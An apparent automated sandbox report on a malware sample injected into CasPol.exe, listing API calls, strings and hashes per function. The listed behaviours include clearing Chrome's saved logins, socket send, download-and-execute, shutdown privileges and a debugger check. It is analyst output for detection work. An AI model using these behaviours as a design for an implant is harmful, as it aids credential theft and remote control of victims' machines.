                                                                                                                  • Instruction Fuzzy Hash: 0AB1B571A043006BC614BA75CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                                                                  APIs
                                                                                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                                                  • GetLastError.KERNEL32 ref: 0040B261
                                                                                                                  Strings
                                                                                                                  • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                                                  • UserProfile, xrefs: 0040B227
                                                                                                                  • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: DeleteErrorFileLast
                                                                                                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                  • API String ID: 2018770650-1062637481
                                                                                                                  • Opcode ID: 7ecc4e94247dd75e85f2eb484a84449b95e5f3b3bb19d81e9f11951ce067ef14
                                                                                                                  • Instruction ID: b4925b9b145212f78872d6bf605c5cdf000d45b1535ad2fa459343da0bf9ff5a
                                                                                                                  • Opcode Fuzzy Hash: 7ecc4e94247dd75e85f2eb484a84449b95e5f3b3bb19d81e9f11951ce067ef14
                                                                                                                  • Instruction Fuzzy Hash: 8C01623168410597CA0577B5ED6F8AE3624E921718F50017FF802731E6FF7A9A0586DE
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                  • GetLastError.KERNEL32 ref: 00416B02
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                  • String ID: SeShutdownPrivilege
                                                                                                                  • API String ID: 3534403312-3733053543
                                                                                                                  • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                  • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                                                  • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                  • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                                                  APIs
                                                                                                                  • __EH_prolog.LIBCMT ref: 004089AE
                                                                                                                    • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                                    • Part of subcall function 0040428C: connect.WS2_32(?,00F4B2F8,00000010), ref: 004042A5
                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                                                    • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(000002CC,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                    • Part of subcall function 00404468: SetEvent.KERNEL32(000002CC,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                    • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                                    • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                                    • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4043647387-0
                                                                                                                  • Opcode ID: 2e118caea6eb98721dec0b2ae2545db872e6122bf62c10857914d379e6fc8d09
                                                                                                                  • Instruction ID: 093ddd6807f9b365337d5cb0cb3505b04edbc5c9b0fee964739ae84c01535933
                                                                                                                  • Opcode Fuzzy Hash: 2e118caea6eb98721dec0b2ae2545db872e6122bf62c10857914d379e6fc8d09
                                                                                                                  • Instruction Fuzzy Hash: 50A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF506B71D2EF385E498B98
                                                                                                                  APIs
                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041982A,00000000,00000000), ref: 00419BDD
                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041982A,00000000,00000000), ref: 00419BF2
                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419BFF
                                                                                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041982A,00000000,00000000), ref: 00419C0A
                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1C
                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 276877138-0
                                                                                                                  • Opcode ID: d0335b8e3d7468fec46ab29645fca41a8d5a3df9c65c6e17278e64ff330a848c
                                                                                                                  • Instruction ID: 029754fb73528063a62336f1848e5bb122dc48601db67947cc2268dfcf3d9ab0
                                                                                                                  • Opcode Fuzzy Hash: d0335b8e3d7468fec46ab29645fca41a8d5a3df9c65c6e17278e64ff330a848c
                                                                                                                  • Instruction Fuzzy Hash: 2EF089755053146FD2115B31FC88DBF2AECEF85BA6B00043AF54193191DB68CD4595F5
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00418ECF
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F9B
                                                                                                                    • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Find$CreateFirstNext
                                                                                                                  • String ID: @CG$XCG$>G
                                                                                                                  • API String ID: 341183262-3030817687
                                                                                                                  • Opcode ID: 3625e89d811a110726c67b55866f0aaafde1f67b3117887488e3d907e6405d59
                                                                                                                  • Instruction ID: 4fcfe6ad4d4b9cbb37a9178feb6c4e4542e518df657a804f5f9e1d603b628f73
                                                                                                                  • Opcode Fuzzy Hash: 3625e89d811a110726c67b55866f0aaafde1f67b3117887488e3d907e6405d59
                                                                                                                  • Instruction Fuzzy Hash: 408153315042405BC314FB61C892EEF73A9AFD1718F50493FF946671E2EF389A49C69A
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                    • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                    • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                    • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                    • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                                                  • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                                                  • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                  • String ID: PowrProf.dll$SetSuspendState
                                                                                                                  • API String ID: 1589313981-1420736420
                                                                                                                  • Opcode ID: f2258adae91e008b6bbe8d53d562ac2432b0fccb6b9bb8c14df452b20ce69b50
                                                                                                                  • Instruction ID: a9af72b6b9eaf8561cd509fc4cf8b1c610007ddf0d7e7dc7bbe2947ee761077a
                                                                                                                  • Opcode Fuzzy Hash: f2258adae91e008b6bbe8d53d562ac2432b0fccb6b9bb8c14df452b20ce69b50
                                                                                                                  • Instruction Fuzzy Hash: B22161B0604741E6CA14F7B19856AFF225A9F80748F40883FB402A71D2EF7CDC89865F
                                                                                                                  APIs
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 0045128C
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 004512B5
                                                                                                                  • GetACP.KERNEL32 ref: 004512CA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoLocale
                                                                                                                  • String ID: ACP$OCP
                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                  • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                  • Instruction ID: c7787d6075dc192170befbe1ddc6ff7be643600d5f5c624e054d22ce072cfab5
                                                                                                                  • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                  • Instruction Fuzzy Hash: 9621C432A00100A7DB348F55C900B9773A6AF54B66F5685E6FC09F7232E73ADD49C399
                                                                                                                  APIs
                                                                                                                  • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A660
                                                                                                                  • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A674
                                                                                                                  • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67B
                                                                                                                  • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A68A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                  • String ID: SETTINGS
                                                                                                                  • API String ID: 3473537107-594951305
                                                                                                                  • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                  • Instruction ID: 54a99f42213d160abf76577abca5e20a835261b5cb21c96a6540e7550e34f59b
                                                                                                                  • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                  • Instruction Fuzzy Hash: F3E09A7A604710ABCB211BA5BC8CD477E39E786763714403AF90592331DA359850DA59
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                    • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                    • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                    • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                    • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                                    • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                                                                                  • GetUserDefaultLCID.KERNEL32 ref: 004514D3
                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 0045152E
                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 0045153D
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451585
                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 004515A4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 745075371-0
                                                                                                                  • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                  • Instruction ID: 411f265c59fe6ea8e7a4a7f389aa671ff947d679512e0c94986e3a05ae8bdf1c
                                                                                                                  • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                  • Instruction Fuzzy Hash: 4951B331900205ABDB20EFA5CC41BBF73B8AF05306F14456BFD11DB262D7789948CB69
                                                                                                                  APIs
                                                                                                                  • __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1157919129-0
                                                                                                                  • Opcode ID: 134fb9258ab0cdae9c79f5a052adaa00df324bba5dabcaa7350581133739d8c7
                                                                                                                  • Instruction ID: 8d2d5af9b240bd76912c5a42ed9d01478aca41623b4ca31e05b92188a1ecdcc3
                                                                                                                  • Opcode Fuzzy Hash: 134fb9258ab0cdae9c79f5a052adaa00df324bba5dabcaa7350581133739d8c7
                                                                                                                  • Instruction Fuzzy Hash: EE5172329041089ACB14FBA5DD969ED7778AF50318F50017EB806B31D2EF3CAB498B99
                                                                                                                  APIs
                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: DownloadExecuteFileShell
                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$open
                                                                                                                  • API String ID: 2825088817-4197237851
                                                                                                                  • Opcode ID: 51ec5b72d808d2940468360efcd3f6a48f6bfd3c4046981a37eba07d625ba236
                                                                                                                  • Instruction ID: ed092bbb38966d98691ab8c1252c2e533cce500cde7a5ae80e96292b959be8c1
                                                                                                                  • Opcode Fuzzy Hash: 51ec5b72d808d2940468360efcd3f6a48f6bfd3c4046981a37eba07d625ba236
                                                                                                                  • Instruction Fuzzy Hash: AC61A231604340A7CA14FA76C8569BE77A69F81718F00493FBC46772E6EF3C9A05C69B
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFind$FirstNextsend
                                                                                                                  • String ID: x@G$x@G
                                                                                                                  • API String ID: 4113138495-3390264752
                                                                                                                  • Opcode ID: e7b18a49c8fe02a695f0156aba99b99c0110d0c894b694f766df84ba5171fd6b
                                                                                                                  • Instruction ID: 69ed09b71aae528489a15fdfe73527b1f784865601dfee234b785914c9021214
                                                                                                                  • Opcode Fuzzy Hash: e7b18a49c8fe02a695f0156aba99b99c0110d0c894b694f766df84ba5171fd6b
                                                                                                                  • Instruction Fuzzy Hash: 4D2147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                                                  APIs
                                                                                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                                                                                                    • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                                    • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                                    • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                  • API String ID: 4127273184-3576401099
                                                                                                                  • Opcode ID: a245bcba594aafc3506fa3fd8a5928f5fbb82046cba1041144db6cf1cc865380
                                                                                                                  • Instruction ID: f939710b15fdea32ddc266fac7b70a3034aa980cea7cdc9a443a85228e3c1b8e
                                                                                                                  • Opcode Fuzzy Hash: a245bcba594aafc3506fa3fd8a5928f5fbb82046cba1041144db6cf1cc865380
                                                                                                                  • Instruction Fuzzy Hash: 69113332B8060433D514343A4E6FBAE1806D756B60FA4015FF6026A7DAFB9E4AE103DF
                                                                                                                  APIs
                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                  • String ID: h(RA/
                                                                                                                  • API String ID: 3906539128-661517699
                                                                                                                  • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                  • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                                                  • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                  • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                                                  APIs
                                                                                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                                                                                                    • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                                    • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                                    • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                  • API String ID: 4127273184-3576401099
                                                                                                                  • Opcode ID: a1aecca224c57a5702e428d2a279967f7ead68b4c693223dd68e6522a7beb948
                                                                                                                  • Instruction ID: 2aa0b6b87930d0e8bc36fe4f809622c3d335fadd5e5dd78f891cc162e383a86f
                                                                                                                  • Opcode Fuzzy Hash: a1aecca224c57a5702e428d2a279967f7ead68b4c693223dd68e6522a7beb948
                                                                                                                  • Instruction Fuzzy Hash: E1F06232B8021422D529357A4E2FBEE1801D796B20F54002FF202A97E6FB8E4AD142DE
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                    • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                    • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                    • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00450B71
                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 00450C01
                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 00450C0F
                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00450CB2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
